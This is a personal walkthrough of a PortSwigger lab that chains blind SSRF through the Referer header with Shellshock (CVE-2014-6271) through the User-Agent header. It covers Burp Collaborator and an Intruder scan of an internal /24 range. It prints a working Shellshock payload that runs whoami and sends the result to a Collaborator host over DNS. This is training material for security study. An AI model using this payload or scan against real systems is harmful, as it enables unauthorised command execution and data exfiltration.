[**Blind SSRF with Shellshock Exploitation**](https://portswigger.net/web-security/ssrf/blind/lab-shellshock-exploitation) lab, which combines two serious vulnerabilities: **Server-Side Request Forgery (SSRF)** and **Shellshock (CVE-2014-6271)**.
##### Step-by-Step Exploitation Plan
##### 1. **Recon: Identify SSRF Trigger**
- Visit any product page (e.g., `/product?productId=1`)
- In Burp, note that it causes the server to send a request to the URL in the `Referer` header
- That outbound request includes the `User-Agent` you control
➡️ **This gives you two key vectors:**
- SSRF via `Referer`
- Shellshock via `User-Agent`
---
##### 2. **Install Collaborator Everywhere**
- Go to Burp → BApp Store → Install **Collaborator Everywhere**
- Set **target scope** to include the lab domain
- It will automatically inject Burp Collaborator payloads into headers, making discovery easy
![[CleanShot 2025-05-03 at 12.52.20.png]]
---
##### 3. **Generate Collaborator Payload**
Go to the **Burp Collaborator** tab and click `Copy to clipboard` — you'll get something like:
```
v41dugnd8u9on3g7z1lihjz4dsrtx4.burpcollaborator.net
```
---
##### 4. **Build Shellshock Payload**
Use this classic Shellshock syntax:
##### 🧨 Shellshock Payload (with Collaborator DNS exfil)
```bash
() { :; }; /usr/bin/nslookup $(whoami).v41dugnd8u9on3g7z1lihjz4dsrtx4.burpcollaborator.net
```
- `() { :; };` triggers the Bash function definition bug
- `nslookup $(whoami)...` causes the internal server to leak the OS user via a DNS query to Collaborator
---
##### 5. **Intruder Setup: Blind SSRF Range Scan**
1. Send a **product page** request to **Burp Intruder**
2. Replace `User-Agent` with your Shellshock payload
3. Replace `Referer` with:
```
http://192.168.0.1:8080
```
Then highlight `1` (last octet) and click **Add §**
![[CleanShot 2025-05-03 at 12.55.25.png]]
#### Payloads tab:
- Payload type: `Numbers`
- From: `1`
- To: `255`
- Step: `1`
✅ This will scan the full internal `/24` range for a vulnerable service.
![[CleanShot 2025-05-03 at 12.56.37.png]]
---
##### 6. **Start Attack & Monitor Collaborator**
- Run the attack
- Go to **Burp Collaborator** and click `Poll now`
- Watch for **DNS interactions** like:
```
username.v41dugnd8u9on3g7z1lihjz4dsrtx4.burpcollaborator.net
```
🎯 The subdomain prefix (`username`) reveals the **OS user**.
![[CleanShot 2025-05-03 at 12.57.03.png]]